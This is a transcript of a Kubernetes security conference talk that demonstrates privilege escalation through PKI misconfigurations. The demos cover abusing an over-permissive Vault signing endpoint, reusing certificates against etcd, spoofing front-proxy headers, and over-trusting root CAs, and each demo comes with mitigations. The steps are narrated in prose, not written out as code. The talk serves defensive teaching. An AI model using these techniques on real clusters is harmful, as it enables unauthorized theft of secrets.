 Hi. Thank you so much for coming and joining me with PKI the wrong way. I'm Tabitha Sable. I work as system security engineer at Datadog. We're a cloud native monitoring provider. So we handle trillions of data points per day across product features like log analysis, metrics aggregation, security monitoring, and application performance monitoring. There's extensive infrastructure to support all of those product features with dozens of Kubernetes clusters, tens of thousands of nodes. I focus on hacking, hardening and defending that infrastructure and helping to ensure that our operations teams and security teams are working together and always helping to level each other up. I also try to chop wood and carry water for upstream Kubernetes by serving as co-chair of Kubernetes security and an associate member of the platform security committee. The goals for today what I'm really hoping to do here is to share some lessons that I've learned from some Kubernetes security research that I've done and encourage you to think about your clusters. In the way that an adversary would think about them. And also I want to have fun and just have a chance to say, hey, watch this. So what's on the hacker agenda. First, we'll do a review of what is going on inside a Kubernetes control plane, specifically around the use of TLS. And then we'll walk through four demos where we will hack a misconfigured Kubernetes cluster because of oversights in its configuration and use of TLS. So we'll jump right into that review. The first thing that we need to deal with is too many acronyms. This talk is going to be inevitably filled with acronyms. And I want to make sure that we all start off in the same place. So one of the most key ones that's going to be in this talk is TLS transport layer security. This is a protocol that usually sits on top of TCP and it provides an encrypted and authenticated data stream from a client to a server. So it uses public key cryptography for the server to prove its identity to the client. Mutual TLS is an optional extension to TLS where the client also uses public key cryptography to prove its identity to the server. Thus, each has authenticated the other mutually. The way that they do that is by the use of a certifying authority. This is a public key certificate that signs other certificates. And so if software trusts a particular certifying authority, then by extension, it believes in and trusts every certificate signed by that certifying authority. This concept extends into the concept of public key infrastructure, which is like the entire family tree of certifying authorities that have signed potentially other certifying authorities to eventually sign certificates that are used for clients and servers. Here is your basic Kubernetes architecture diagram with at CD there holding all of the state, the API server in the center of the world, and everything else talking to the API server. And of course, occasionally the API server talks up to other things as well. So, within at CD at CD uses mutual TLS, both to authenticate client connections into the at CD cluster, and for peer connections between nodes in an at CD cluster. The API server makes the most complex use of TLS within the Kubernetes control plane. It performs mutual TLS authentication of clients that connect to it, but it is itself also a mutual TLS client when it connects to at CD, the cooblet and various other components. Furthermore, there is this front proxy or aggregation layer that's configured by the request header arguments to the API server, and it also performs separate mutual TLS authentication of requests that are coming in from a proxy server in front of the API server. But it also uses mutual TLS to authenticate itself to other extension API servers when you access them through it. The cooblet and other parts of the control plane also use mutual TLS when they communicate with the API server, and most of them offer a metrics endpoint, or some small API, and they use mutual TLS authentication of client connections to that. So you can get your own applications, which likely include playing TLS servers, like for web services, and may include mutual TLS servers or clients, like for example, if you are using a service mesh, or if you're doing authentication between some application server and a backend database. So with that all taken care of, let's hop in and actually hack some clustering. So the first situation that we'll work through here is based on the idea that your certifying authority controls the issuance of credentials for your Kubernetes cluster. So no matter how sophisticated the RBAC configuration that you have in your Kubernetes cluster may be, if your certifying authority is too free in who it issues certificates to, then you may have a vulnerability there. So we're going to access our certifying authority, require, acquire a certificate inappropriately, and use that to become cluster admin. So the local kind cluster here that's been provisioned, it's using HashiCorp Vault as an external certifying authority that has provisioned the many certificates and keys that are needed to make Kubernetes cluster work. And in this case, my Vault configuration is not very well locked down. So one of the workloads on this Kubernetes cluster is a basic HTTPS web server. And this HTTPS web server is configured to be able to access the Vault cluster in order to generate the SSL keys that it the TLS keys that it needs to be able to offer web service. So let's take a quick look at the certificate. You know, it's issued for www.example.net by the demo example net PKI. Great. And the way that it's able to do that is because it has a Vault token mounted into it. And this particular Vault token is a human readable string, because this is a demo and I wanted it to be easy to set up, but usually this would be some long random secret value. So with this certificate, I shouldn't be able to do anything interesting, but I know that I can access Vault. So if I'm able to access more within Vault than I should be able to, maybe I can get a better certificate that's useful in the Kubernetes cluster. So I want a certificate specifically that has the organization system masters in the distinguished name of the certificate, because in a default Kubernetes cluster, there's a cluster role binding from that group to cluster admin. And furthermore, that particular group is special and has all privileges within the Kubernetes control plane, even if you delete that role binding. So this is kind of confusing, but it's necessary for internal communication within the API server itself. So I'm going to make this open SSL configuration file so that I can run an open SSL rec command to generate a certificate signing request. Now, normally, I should not be able to access the dangerous sign verbatim endpoint of Vault, because then Vault will sign anything I send it. But in this case, Vault administrators have not been very careful, and I do have access to that. So I can use this Vault command Vault right with the path to the Kubernetes PKI notice not the demo example that PKI, and I can submit the certificate signing request. Now I have the resulting certificate in this shell variable JSON. So I'll use jq to write it out in a nice format into a certificate file. And we can look at the resulting certificate issued by the demo Kubernetes PKI for a goose who's a member of your system administrators group. This is exactly the key that we wanted. So with this certificate, we can talk to the API server. I don't have CUBE CTL inside this web server pod, and it looked pretty suspicious if I downloaded it. So instead I'll use the notorious hacker tool curl to communicate with the API server and say, can I please have all of the secrets out of the CUBE system name space? Of course I can, because that's what the certificate says I should have access to. So what do we learn from this? How can we mitigate this? I mean, treat your certifying authority permissions with care. Your CA configuration is an overlay over your RBAC configuration. And so if your CA is willing to dispense certificates that people or services shouldn't have, then they will be able to get them. Use least privilege when you're configuring your CA. So like specifically for vault, you can set up roles that specify exactly what settings are allowed to be in the certificate, and then that can prevent access to other settings that would be inappropriate. We'll move on to another demo here, which is what happens if you only have one independent PKI in your Kubernetes cluster? Well, as we discussed before, SED uses mutual TLS to authenticate clients that are connecting to it. And in the usual configuration in a Kubernetes cluster, every certificate signed by the SED CA has full access to the contents of SED. And of course, SED stores everything for your control plane. So therefore, if SED trusts the same certifying authority that Kubernetes client credentials are issued from, you can simply submit a Kubernetes client certificate to SED and access anything you want. Let's see what that would look like. Here we are back at a normal shell, and I have a Kubernetes client certificate. You see it's issued by the demo Kubernetes PKI, and it's issued to me personally, Tabby, from the group Katz. Now, I happen to have SED CTL installed on my system because I'm a system administrator. And so what happens if I take this Kubernetes client cert and pass it to SED CTL and tell it to talk to my SED cluster? I can just read out whatever values that I want from SED. I also could write whatever values I wanted into SED. So this client cert doesn't let me do very much when I pass it to the API server. But because I'm also able to inappropriately pass it to SED, I can do anything that I can imagine. Now, this doesn't have to be this way. What if I don't have SED CTL installed? Time was you could just talk to SED with curl. And in the SED API version two, that's how that works. But SED API version three uses GRPC. It's not nearly as human readable. But SED developers have taken care of us. There is a SED feature that's on by default that lets you access SED V3 through normal HTTP requests in addition to the GRPC protocol. So you have to read a little bit of the documentation to learn how to access it. But once you've done so, you can submit a post request to the appropriate endpoint with some JSON and base64 encoded query parameters. And you can pull the keys out of SED with curl as well. This does not have to be this way. SED supports RBAC. Now, to use SED CTL, I have to pass all these ugly arguments. So I'll make a shell alias so that the remaining commands look easier to read. We can enable SED RBAC and that can make this particular attack harder to pull off. It's relatively easy. You use SED, add user, and grant role commands. So it's necessary to create a root user and no password equals true means that you can't log in with a password only with mutual TLS. Then we'll also create a user called kube API server at SED client because that's the default CN in the client cert used by the API server when it accesses at SED. We have bound the root role to both of these because we're not trying to restrict what the API server can do. We're only trying to restrict access to only the API server. After we've created those users and role claims, we can enable authentication. Now that we've enabled authentication, what happens when I use SED CTL and pass my Kubernetes client cert in? Because tabby isn't one of the users that has access to SED anymore, but Kubernetes is still working. I can still access the API server and do things. I'm going to go ahead and disable SED authentication because if I left it on, it would break some of the subsequent demos. What have we learned from this and how can we mitigate this? It's really critical to have separate PKIs for your SED cluster and for your Kubernetes API server. Additionally, you can use network policy, either like with a firewall or with cloud provider or ACLs, or if you're inside Kubernetes with Kubernetes network policy to restrict who can even communicate with the SED port. And if you like, you can enable SED authorization. Using SED authorization is a relatively uncommon configuration, so I definitely recommend that you test it first if you decide that you want to use it. But this can mitigate some of the hazard that comes from having this PKI shared, but it's really best to have separate PKIs. We'll get into the next demo here, which involves my least favorite API server feature. And the reason for that is that it enables two different features at once, the dangerous and uncommon front proxy authentication, where a proxy server passes headers to the API server and tells it who you are, and the harmless and common aggregation layer where the API server functions as a proxy in order to talk to some other part of the Kubernetes API. So front proxy authentication looks like this. The user uses mutual TLS or some other method to communicate with a proxy server the API server trusts. Then that proxy server communicates with the API server and passes special HTTP headers specifying the user on whose behalf it's working. The aggregation layer to an extension API server looks very similar because it's actually the same workflow, except that the API server itself is the proxy in front of the extension API server. So like, for example, if you're using the metric server that supports horizontal power auto scaler and coupe CTL top. This is how this is how it works your user talks to the API server and the API server communicates with the extension API server metric server by using request header off. So how this attack is going to work. It depends on a little bit of setup. So the, in this case in this cluster, the aggregation layer trust the same CA as the main Kubernetes API server, and the command line argument request header allowed names is missing on the API server. This means that right now in this cluster, any Kubernetes client cert can pass the appropriate HTTP headers to enable front proxy authentication. So that's what we're going to do. We'll submit our Kubernetes user cert to the API server, including the appropriate headers, which will allow us to authenticate as anyone and become cluster admin. To be able to communicate directly with the API server from this shell. First, I need to find what port number my kind cluster is running the API server on. So we'll do that. And now I'm going to just use my Kubernetes client cert to try to get all the secrets from the coupe system namespace. And of course, it smacks my hand for that. Tabby can't list secrets in coupe system namespace, because that's not allowed. I'm not a cluster administrator. But that's fine, because I know that this cluster is misconfigured, or I'm willing to try it and find out if this cluster is misconfigured. So now I'm doing the same curl call to the API server. But I'm saying, by the way, I'm a proxy server, and I'm communicating with you on behalf of this goose that is honking around in your system administrators group. Can I please have those coupe system secrets for a goose like you, anything. What can we do to mitigate this. It's important to use a separate PKI for the request header off options with very strict access controls on it, because this PKI is more powerful than the usual one. Also, when you're configuring this, make sure to pass all of the relevant arguments to the API server, look it up in the documentation. Alternately, you can pass no request header arguments at all. This will cause the, the front proxy and extension API server feature to be unconfigured. The downside of doing this is that extension API servers can't use an auto discovery feature to learn how to configure themselves. You will have to pass command line arguments to them in order to tell them how to be configured to accept connections from the API server. So that would be adopting an unusual configuration. But if you're willing to, if you're willing to research which extension API servers you're using and how to configure them that way. It can reduce your need for having separate PKI's and help to harden your configuration against these sorts of errors. Another demo that we can do here has to do with inappropriate trusting of chained PKI's. So earlier I said that a certifying authority can sign another certifying authority. This is a diagram of the CAs that are currently in the vault cluster that's set up for our demo. There is one root CA, which is signed an intermediate CA and that intermediate CA has signed five other CAs for use by example.net, the front proxy feature of the API server, the SED, the API server itself, and another non production Kubernetes cluster. But when those certificates have been loaded into the cluster for the mutual TLS client trust, the root certificate is the one that has been loaded in as being trusted. And so let's see some of the things that can happen when you trust too much of your PKI tree. For example, if the root CA is in the client CA file argument to SED, then every certificate issued anywhere in the PKI tree is trusted by SED. We will be able to send any certificate we want such as an application certificate in and we'll be able to access SED. So let's go ahead and do that. We'll hop back into our web server pod here and review what the web server config looks like. And we'll paste in one of these curl calls that talks to SED. So the web server certificate is here in web server dot pen. Because it's signed by the example net PKI, which is a grandchild of the root CA trusted by SED, I can take my web server server cert and send it to SED. Say, give me all the CUBE system secrets. And it says, I'm happy to oblige. Let's do another one of these. Let's do another one of these hacks. So if the root CA is in the client CA file argument of the API server, then we can have cross cluster access. So here is a CUBE config for my Kubernetes client. And here is another CUBE config for being a goose that is cluster admin of the non-prod cluster. Notice the issuer is different between these two certificates in these two CUBE configs. But because the API server is trusting the root CA and not the leaf CA, we can probably do some inappropriate access anyway. So we'll specify the non-prod Kubernetes admin CUBE config to CUBE CTL get secrets into our production cluster. And of course it gives them to us because it doesn't know any better. Another hack that we can do here is similar, but it combines that trust with the request header allowed names or a CA that allows issuing certs for any name. In that case, we can submit our application certificate like from a web server directly to the API server. Our web server cert won't have the appropriate U equals O equals in the certificate subject, but with request header allowed names that doesn't matter if we pass in the appropriate HTTP headers. Or if the CA allows signing a cert with any name, we can go and sign a cert with the appropriate name and pass it in. So let's go ahead and do that. Again, we'll need to get into our web server. And let's take a quick look at the web server's certificate. We try and pass it into the API server and it, the API server is not having it. The user www.example.net can't access secrets. It's not. www.example.net isn't even a Kubernetes user. This is not right. But even this is showing us something scary. The fact that we got permission denied here proves that the API server trusted our certificate and it believes that we really are www.example.net. This is because it's misconfigured to trust the root CA. So because this cluster is also poorly configured with missing request header allowed names option, we can pass in the appropriate HTTP headers to say, hey, this is the system admin goose. You should give us those secrets. And of course, it is obliged to do so. So what can we do to mitigate all of these kind of problems? The number one thing that we can do to save ourselves from this issue is use standalone certifying authorities. Stating really has very little benefit in a Kubernetes context and leaves you open to making these sorts of mistakes. So just don't do it. Use standalone CA's and then you can't make this mistake in the first place. For some reason, you feel that you must use change CA's be very careful to only trust the leaf CA. So like in this case, for the Kube API server client CA file argument, we would pass in this CA that's circled in green here on the diagram, not the root CA like what we did. Other mitigations are also possible. Make sure that you have tight permissions on all of your CA's because going back to the beginning of the presentation, your CA's access control is a gate to your Kubernetes access control. While you're configuring those CA permissions set client auth and server auth flags specifically on the certificates that need them. In the case of the web server cert being used to access the API server. If the CA had removed the client auth flag from that web server cert, it wouldn't have worked, even though the other misconfigurations were present. And again, if you wish to you can enable at CD authentication, which would make doing some of these exploits harder to wrap this up. PKI is really complex the configuration is complex there are many different command line options, but all of those details matter in nearly every case. If you misconfigure something, it creates some kind of opportunity to do something inappropriate. So you need to look at it creatively, because these particular hacks are just fun examples that I cooked up for us to share. There are certainly other ways in which PKI misconfigurations could be exploited in Kubernetes. So the message here is really use three separate certifying authorities per cluster and make them standalone. And if you're unable to follow those rules that keep your life simpler, be very careful that you understand every option you're choosing. Thank you so much for spending this time with me. It's been, it's been a lot of fun to to honk at this cluster with you and share, you know, the things that I've learned about some other ways that TLS can go wrong. If you think that this kind of thing is interesting. Note that we are hiring like data dog is looking for both security and operations people across all parts of the organization. You can talk to me online. I'm on Kubernetes slack. I'm on Twitter can send me email. And if you want to play along with some of these exploits, you can go to my GitHub and you can download the setup script and the demo notes that were used to do this demo. So again, thanks a lot, and go have fun with your clusters.